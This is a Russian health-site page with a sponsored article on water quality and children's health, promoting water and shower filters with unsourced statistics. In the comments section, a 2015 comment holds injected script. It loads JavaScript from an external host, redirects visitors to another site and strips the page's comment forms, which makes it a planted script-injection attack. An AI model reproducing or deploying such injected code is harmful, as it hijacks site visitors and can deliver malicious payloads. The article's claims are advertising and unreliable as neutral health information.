Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как качество воды влияет ...  >>  Как качество воды влияет на здоровье ваших детей?
 
Обратная связь
 

Как качество воды влияет на здоровье ваших детей?

Размер шрифта
07 декабря 2012 12:25
  • google_analytics: false
  • Нравится

Мама, я хочу пить! Папа, дай мне водички! Каждому родителю знакомы эти слова.

Как качество воды влияет на здоровье ваших детей?

Дети с самого раннего возраста уже могут определить, когда им хочется пить. Они способны выражать свое желание выпить воды, как только научатся говорить. И только от родителей зависит, насколько качественную и чистую воду потребляют их дети.

Чистая питьевая вода необходима растущему организму. Вода утоляет жажду, восполняет запасы жидкости в организме  и предотвращает усвоение организмом «пустых калорий» из потребляемой пищи. Многочисленные научные исследования доказывают, что в качестве источника жидкости для детей всех возрастов и уровней активности лучше всего подходит чистая питьевая вода, нежели фруктовые соки, газированные напитки, напитки из порошка с подсластителями, а также спортивные напитки, содержащие  в своём составе электролиты. Детям всех возрастов (за исключением младенцев до 1 года) необходимо давать воду в течение всего дня. Получить чистую воду контролируемого качества можно используя фильтр для воды и своевременно меняя картриджи в нем.

Вода хорошего качества также должна использоваться для купания детей и стирки детской одежды и постельных принадлежностей. Вредоносные бактерии и вещества, содержащиеся в некачественной воде, могут оставаться на коже, волосах детей, а также на детском белье и одежде, вызывая аллергию, астму и другие заболевания. Большинство вредных веществ, содержащихся в воде невозможно заметить невооруженным глазом; некоторые даже не влияют на вкус или запах воды. От вредоносного хлора в воде можно избавиться с помощью фильтра для душа, который крепится между лейкой и шлангом.

Загрязненная вредными веществами вода особенно опасна для детей

Вода плохого качества вредна для всех людей, но особенно опасно, когда такую воду потребляют маленькие дети, так как развивающиеся организмы детей наиболее восприимчивы к  вредным воздействиям некачественной воды.

Дети до 5 лет составляют всего 10% населения Земли, но они же являются 40%  населения планеты, страдающими от заболеваний, связанных с употреблением некачественной воды, такими как: диарея, дегидратация (обезвоживание организма), астма, различного вида аллергии, а также отравление свинцом. Вода, которая кажется нам чистой, может подорвать здоровье ребенка!

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Вся правда об острой кишечной инфекции   Как пережить жару дома   Лучшая природная вода для здоровья   Суперпродукты до и после застолья  

Слайдшоу

1
Обезвоживание организма
Как пережить жару без кондиционера?!
Как есть и худеть?

Тесты

Что вы знаете о воде?
Что вы пьете?
Безопасна ли ваша кухня?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.